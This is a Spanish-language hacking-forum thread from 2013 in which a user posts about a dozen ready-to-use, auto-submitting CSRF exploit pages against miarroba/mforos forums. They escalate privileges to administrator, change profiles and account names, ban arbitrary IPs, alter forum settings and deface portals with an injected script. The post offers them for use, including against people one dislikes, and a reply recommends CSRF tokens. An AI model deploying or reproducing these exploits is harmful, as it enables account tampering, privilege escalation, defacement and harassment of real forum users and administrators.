comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

CSRF'S miarroba forums [By Pekador]

  • 1 Respuestas
  • 1455 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Réplica1

  • *
  • Underc0der
  • Mensajes: 35
  • Actividad:
    0%
  • Reputación 0
  • ... está historia se acabó.
    • Ver Perfil
    • @Pekador - Twitter
« en: Agosto 27, 2013, 09:39:34 am »
Para cambiar la firma de cualquier foro mi@

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="http://netpoison.mforos.com/options/" method=post name="csrf1">
  8. <input type="hidden" name="firma" value="Underc0de.org">
  9. <input type="hidden" name="boton_continuar" value="Continuar">
  10. <body onload="envio_csrf()">

-----------------------------------------------------------------------------------------------------

Este csrf se tarda mas en ejecutarlo ya que por cada palabra lo tienes que subir a un hosting distinto pero sigue valiendo, lo que ara es una vez que alla filtrado esa palabra se redirigira a el otro csrf y se filtraba y así sucesivamente es algo 'molesto' pero sigue valiendo!

lo que hace es filtrar palabras como 'hola' por la palabra que queramos.

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="http://foros.miarroba.es/filtro_palabras.php?id=2099129" method=post name="csrf1">
  8. <input type="hidden" name="original" value="hola">
  9. <input type="hidden" name="filtrada" value="Underc0de.org">
  10. <input type="hidden" name="boton_continuar" value="Continuar">
  11. <body onload="envio_csrf()">
  12.  
  13. <?php
  14. You are not allowed to view links. Register or Login('Location: otrocsrf.com');
  15. ?>

---------------------------------------------------------------------------------------------------------------------------

Con este csrf desactivas el avatar o la firma a cualquier usuario permanentemente asta que la vuelvan activar

Firma:


Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="http://netpoison.mforos.com/users/crackme/" method=post name="csrf1">
  8. <input type="hidden" name="tabla_boton" value="Desactivar firma">
  9. <body onload="envio_csrf()">


Avatares: 


Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="http://netpoison.mforos.com/users/crackme/" method=post name="csrf1">
  8. <input type="hidden" name="boton" value="Desactivar avatares">
  9. <body onload="envio_csrf()">

------------------------------------------------------------------------------------------------------------------------------

Con este csrf puedes elevarte los privilegios a administrador


Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="http://teamhackworld.mforos.com/users/crackme/" method=post name="csrf1">
  8. <input type="hidden" name="nuevo_nivel" value="999">
  9. <input type="hidden" name="accion" value="Cambiar nivel">
  10. <body onload="envio_csrf()">

-------------------------------------------------------------------------------------------------------------------------------

Esta sirve para crear un subforo nuevo

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="http://foros.miarroba.es/nuevo_subforo.php?id=2099129" method=post name="csrf1">
  8. <input type="hidden" name="forotitulo" value="Underc0de.org">
  9. <input type="hidden" name="forodesc" value="El mejor foro">
  10. <input type="hidden" name="txp" value="100">
  11. <input type="hidden" name="mxp" value="100">
  12. <input type="hidden" name="activacode" value="no">
  13. <input type="hidden" name="boton_continuar" value="Continuar">
  14. <body onload="envio_csrf()">

---------------------------------------------------------------------------------------------------------------------------

Este csrf cambia los datos generales de tu usuario de mi@, tu nombre real, tu website, intereses, aficiones, firma etc

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="http://privados.miarroba.es/#!new" method=post name="csrf1">
  8. <input type="hidden" name="homepage" value="www.Underc0de.org">
  9. <input type="hidden" name="nombre" value="Pekador">
  10. <input type="hidden" name="apellidos" value="Revise su seguridad">
  11. <input type="hidden" name="firma" value="Visita Underc0de">
  12. <input type="hidden" name="descripcion" value="CSRF">
  13. <input type="hidden" name="aficiones" value="Underc0de.org">
  14. <input type="hidden" name="boton_continuar" value="Continuar">
  15. <body onload="envio_csrf()">

--------------------------------------------------------------------------------------------------------------------------

Estos de mi@ tienen mas csrf en sus foros ..., aquí os dejo otro esta vez para banear por ip ¿te cae mal alguien y te sabes su ip? banealo de cualquier foro mi@ ;D

para sacar la id del foro, poner /admin despues de la url: foro.mforos.com/admin

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="http://foros.miarroba.es/baneo_ip.php?id=2099129&do=new" method=post name="csrf1">
  8. <input type="hidden" name="text" value="Aquí la ip que quieran banear">
  9. <input type="hidden" name="motivo" value="//**Underc0de.org**//">
  10. <input type="hidden" name="time" value="30">
  11. <input type="hidden" name="boton_continuar" value="Continuar">
  12. <body onload="envio_csrf()">

-------------------------------------------------------------------------------------------------------------------------------

Buenas aquí os dejo este csrf para mi@ que sirve para cambiar la url del foro, entre otras cosas menos importantes :D

necesitaremos la id del foro, se consige poniendo /admin despues de la url del foro

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="http://foros.miarroba.es/general.php?id=2099129" method=post name="csrf1">
  8. <input type="hidden" name="titulo" value="Underc0de"> //
  9. <input type="hidden" name="nombre" value=".org">
  10. <input type="hidden" name="descripcion" value="Underc0de.org">
  11. <input type="hidden" name="categoria" value="10">
  12. <input type="hidden" name="tagsService[]" value="pwned">
  13. <input type="hidden" name="boton_continuar" value="Continuar">
  14. <body onload="envio_csrf()">
  15.  

-----------------------------------------------------------------------------------------------------------------------------------

Cambia el nombre de la cuenta de mi@

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="http://miarroba.es/usuarios/modificar.php" method=post name="csrf1">
  8. <input type="hidden" name="privacidad" value="registrados">
  9. <input type="hidden" name="nick" value="Underc0de">
  10. <input type="hidden" name="pais" value="12">
  11. <input type="hidden" name="provincia" value="192">
  12. <input type="hidden" name="zipcode" value="60155">
  13. <input type="hidden" name="sexo" value="Hombre">
  14. <input type="hidden" name="dia" value="5">
  15. <input type="hidden" name="mes" value="11">
  16. <input type="hidden" name="ano" value="1994">
  17. <input type="hidden" name="boletin" value="si">
  18. <input type="hidden" name="promos" value="si">
  19. <input type="hidden" name="accion" value="update">
  20. <input type="hidden" name="boton_continuar" value="Continuar">
  21. <body onload="envio_csrf()">
  22.  

------------------------------------------------------------------------------------------------------------------------------------

Rara defacear el portal de cualquier foro de mi@ claro que tenga el portal activado

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="http://foros.miarroba.es/portal.php?id=2037885&seccion=crear_contenido&tipo=personalizado" method=post name="csrf1">
  8. <input type="hidden" name="titulo" value="Pekador">
  9. <input type="hidden" name="codigo" value="<script>document.documentElement.innerHTML='<iframe width=100% height=100% src=URL DEFACE>';</script>">
  10. <input type="hidden" name="columna" value="2">
  11. <input type="hidden" name="nivelmin" value="0">
  12. <input type="hidden" name="nivelmax" value="0">
  13. <input type="hidden" name="tipo" value="personalizado">
  14. <input type="hidden" name="boton_continuar" value="Continuar">
  15. <body onload="envio_csrf()">

---------------------------------------------------------------------------------------------------------------------------------------

Reportado: Sí, pero el dueño no sabe fixearlas yo le ofrecí mi ayuda y la rechazo.

Y hay muchos mas, esto demuestra la seguridad de esos foro saludos y hasta la próxima.
« Última modificación: Agosto 27, 2013, 04:04:55 pm por Pekador »

Desconectado M5f3r0

  • *
  • Underc0der
  • Mensajes: 44
  • Actividad:
    0%
  • Reputación 0
  • Leer la firma.
    • Ver Perfil
  • Skype: m5f3r0
« Respuesta #1 en: Agosto 27, 2013, 04:50:32 pm »
Excelente post compa, al dueño le haría bien colocar token para evitar los ataques CSRF's..

Saludos!
A veces, observo mi pasado y me arrepiento en la actualidad de todo lo que llegue a perder y olvidar por como me veía la sociedad, nunca dejes que las opiniones de los demás te lleguen a afectar moralmente hasta el punto en que dejes de hacer lo que más te apasiona, saludos! (msj escrito en el 2016)

 

¿Te gustó el post? COMPARTILO!



[Tutorial] Vulnerabilidad CSRF By ShadinessDark [Colaboracion de Zero Bits]

Iniciado por dracko.rx

Respuestas: 0
Vistas: 1755
Último mensaje Febrero 24, 2010, 03:24:51 pm
por dracko.rx
Ataques CSRF (Cross site request forgery)

Iniciado por M5f3r0

Respuestas: 11
Vistas: 5423
Último mensaje Septiembre 09, 2013, 03:48:08 pm
por M5f3r0
CSRF Andromeda Botnet [ POC Change Password]

Iniciado por Matabarras

Respuestas: 2
Vistas: 1739
Último mensaje Julio 30, 2013, 07:46:47 pm
por peruvianrulez
[TUTORIAL] Como crear tu csrf

Iniciado por Windero

Respuestas: 4
Vistas: 2417
Último mensaje Agosto 24, 2013, 08:09:05 am
por Réplica1
[CSRF] [SMF] Cambiar perfil

Iniciado por Réplica1

Respuestas: 5
Vistas: 1858
Último mensaje Agosto 26, 2013, 10:42:01 pm
por Réplica1